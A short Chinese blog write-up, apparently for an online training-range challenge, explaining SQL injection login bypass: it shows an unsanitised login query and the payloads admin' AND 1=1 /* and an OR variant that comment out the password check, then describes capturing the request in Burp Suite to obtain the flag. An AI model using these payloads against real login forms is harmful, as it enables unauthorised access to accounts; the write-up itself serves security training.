时间:2021-07-01 10:21:17 帮助过:4人阅读
服务端后台存在类似的代码
SELECT * FROM accounts WHERE username=‘admin‘ and password = ‘password‘
后端如果没做校验处理,username 和 password 值从前端传进来直接执行sql语句,就存在可以构造恶意代码。
如果在用户名框内输入"admin‘ AND 1=1 /*", 在密码框内输入任意字符串,那么后台执行的SQL就为
SELECT * FROM accounts WHERE username=‘admin‘ and 1=1 /*‘ and password = ‘password‘
这个有个前提条件是username是admin,如果不是amdin的话可以把and 换成 or
SELECT * FROM accounts WHERE username=‘admin‘ OR 1=1 /*‘ and password = ‘password‘
1、用任意用户名和口令登陆并用burpsuite抓包
2、用户名处使用万能密码登陆成功获取flag(密码不用输了,因为后面的已经被注释)
?
参考:
【经验分享】后台常用的万能密码_数据库_weixin_34297704的博客-CSDN博客
SQL注入漏洞测试(登录绕过)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
SQL注入漏洞测试(登录绕过)
标签:pass lan sql注入 bdc weixin 前端 服务 csdn博客 flag